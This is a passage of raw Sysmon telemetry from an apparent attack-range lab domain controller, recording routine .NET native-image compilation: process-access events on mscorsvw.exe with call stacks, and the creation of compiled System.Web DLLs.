ramework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:26.194{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925E-6005-7B04-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:26.194{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-925E-6005-7B04-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:26.194{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925E-6005-7B04-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:26.116{59A5CD1D-925D-6005-7A04-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13e0-0\System.Web.DataVisualization.Design.dll2021-01-18 13:51:26.116 11241100x80000000000000008755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:27.991{59A5CD1D-925F-6005-7D04-00000000A301}4520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11a8-0\System.Web.DynamicData.dll2021-01-18 13:51:27.991 10341000x80000000000000008754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:27.553{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925F-6005-7D04-00000000A301}4520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:27.538{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-925F-6005-7D04-00000000A301}4520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:27.538{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925F-6005-7D04-00000000A301}4520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000008751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:27.413{59A5CD1D-925E-6005-7C04-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b34-0\System.Web.Extensions.dll2021-01-18 13:51:27.413 11241100x80000000000000008776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:28.975{59A5CD1D-9260-6005-8304-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ac0-0\System.Web.Entity.Design.dll2021-01-18 13:51:28.975 10341000x80000000000000008775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.772{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-8304-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.756{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-8304-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.756{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-8304-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-8204-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.663{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-8204-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.663{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-8204-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:28.600{59A5CD1D-9260-6005-8104-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1210-0\System.Web.Entity.dll2021-01-18 13:51:28.600 10341000x80000000000000008768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-8104-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.366{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-8104-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.366{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-8104-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.303{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-8004-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.303{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-8004-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.303{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-8004-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:28.241{59A5CD1D-9260-6005-7F04-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a20-0\System.Web.DynamicData.Design.dll2021-01-18 13:51:28.241 10341000x80000000000000008761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.163{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-7F04-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.147{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-7F04-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.147{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-7F04-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 